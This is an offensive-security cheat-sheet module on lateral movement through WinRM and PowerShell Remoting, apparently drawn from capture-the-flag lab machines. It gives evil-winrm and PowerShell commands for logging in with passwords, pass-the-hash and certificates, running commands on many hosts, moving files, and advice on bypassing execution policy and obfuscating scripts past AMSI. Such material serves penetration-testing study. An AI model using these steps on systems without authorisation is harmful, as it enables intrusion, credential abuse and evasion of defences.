Back to All Modules

WinRM and PowerShell Remoting

#Overview

WinRM (Windows Remote Management) on ports 5985/5986 provides PowerShell-based remote administration. It is one of the cleanest lateral movement methods, offering an interactive shell, file upload/download, and script execution. PowerShell Remoting is built on WinRM and provides Enter-PSSession and Invoke-Command from Windows clients. The primary obstacle is the double-hop problem when authenticating to a third system.

#Prerequisites

  • Valid credentials or NTLM hash with Remote Management Users membership
  • Port 5985 (HTTP) or 5986 (HTTPS) accessible
  • evil-winrm (Linux) or PowerShell (Windows)

#Exploitation / Execution

#1. evil-winrm with Credentials (Linux)

evil-winrm -i <IP> -u <user> -p '<password>'
BASH

#2. evil-winrm with NTLM Hash (PTH, Linux)

evil-winrm -i <IP> -u <user> -H <NTLM_hash>
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
BASH

#3. evil-winrm with Certificate (Linux)

# Extract cert and key from PFX
openssl pkcs12 -in user.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in user.pfx -nokeys -out cert.pem

evil-winrm -i <IP> -c cert.pem -k key.pem -S          # -S for SSL (port 5986)
BASH

#4. Enter-PSSession (Windows)

$secpass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $secpass)

Enter-PSSession -ComputerName <IP> -Credential $cred
POWERSHELL

#5. Invoke-Command (Windows)

# Single command execution
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { whoami }

# Execute script against multiple targets
Invoke-Command -ComputerName (Get-Content targets.txt) -Credential $cred -ScriptBlock { hostname; whoami }

# Load script from file
Invoke-Command -ComputerName <IP> -Credential $cred -FilePath C:\scripts\enum.ps1
POWERSHELL

#6. File Transfer within Session

# evil-winrm
upload /path/to/local.exe                            # Upload to target
download C:\Users\<user>\Desktop\file.txt            # Download from target

# PowerShell (Windows)
Copy-Item -FromSession $session C:\remote\file.txt -Destination C:\local\
BASH

#7. SSL WinRM (Port 5986)

$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck
Enter-PSSession -ComputerName <IP> -Credential $cred -SessionOption $sessionOption -UseSSL
POWERSHELL

#The Double-Hop Problem

#Problem

When connecting from Host A to Host B via WinRM, and then attempting to access Host C from Host B, credentials are not forwarded. This results in "Access Denied" errors:

# From Host A, Enter-PSSession to Host B
Enter-PSSession -ComputerName HostB
[HostB]: PS> dir \\HostC\C$                    # FAILS - Access Denied
POWERSHELL

#Solution 1: CredSSP (Windows)

Enables credential delegation but has security implications:

# On source (Host A)
Enable-WSManCredSSP -Role Client -DelegateComputer <HostB>
# On target (Host B)
Enable-WSManCredSSP -Role Server

Enter-PSSession -ComputerName HostB -Credential $cred -Authentication CredSSP
POWERSHELL

#Solution 2: Explicit Credentials Within Session

[HostB]: PS> $cred2 = Get-Credential
[HostB]: PS> Invoke-Command -ComputerName HostC -Credential $cred2 -ScriptBlock { dir C:\ }
POWERSHELL

#Solution 3: Pass-the-Hash / Ticket

Use PTH or PTT for the second hop, avoiding credential forwarding entirely.

#Solution 4: Register-PSSessionConfiguration

Create a session configuration that stores credentials:

Register-PSSessionConfiguration -Name AdminSession -RunAsCredential $cred
Enter-PSSession -ComputerName HostB -ConfigurationName AdminSession
POWERSHELL

#Common Pitfalls

  • ⚠️ Remote Management Users group membership required -> verify with net user <username>
  • ⚠️ Double-hop -> always test multi-hop scenarios during engagement planning
  • ⚠️ PowerShell execution policy -> may need bypass: powershell -ExecutionPolicy Bypass
  • ⚠️ AMSI (AntiMalware Scan Interface) -> may block malicious PowerShell scripts; use obfuscation

#OPSEC Considerations

  • 🛡️ WinRM connections generate Event ID 4624 (Logon Type 3) with Authentication Package "Negotiate"
  • 🛡️ PowerShell script block logging (Event ID 4104) records all script content passed via Invoke-Command
  • 🛡️ PowerShell module logging (Event ID 4103) captures pipeline execution details
  • 🛡️ evil-winrm creates wsmprovhost.exe processes, which may be monitored by EDR

#Post-Exploitation Value

  • Full PowerShell access with all .NET framework capabilities
  • File upload/download for tool transfer and data exfiltration
  • Script execution across multiple targets from a single session
  • Credential harvesting via PowerShell cmdlets (Get-ADUser, etc.)

#Cross-References

#Tool References

ToolLink
evil-winrmhttps://github.com/Hackplayers/evil-winrm
PowerShell documentationhttps://docs.microsoft.com/en-us/powershell/

#Source Machines

  • Blackfield (Hard, AD) - WinRM access for svc_backup with SeBackup privilege
  • Cascade (Medium, AD) - WinRM login via s.smith, ArkSvc, and Administrator
  • Escape (Medium, AD) - WinRM for sql_svc and Administrator PTH
  • Forest (Easy, AD) - WinRM for svc-alfresco
  • Return (Easy, AD) - WinRM for svc-printer
  • Sauna (Easy, AD) - WinRM for fsmith and svc_loanmgr
  • Timelapse (Easy, AD) - WinRM via certificate for legacyy and svc_deploy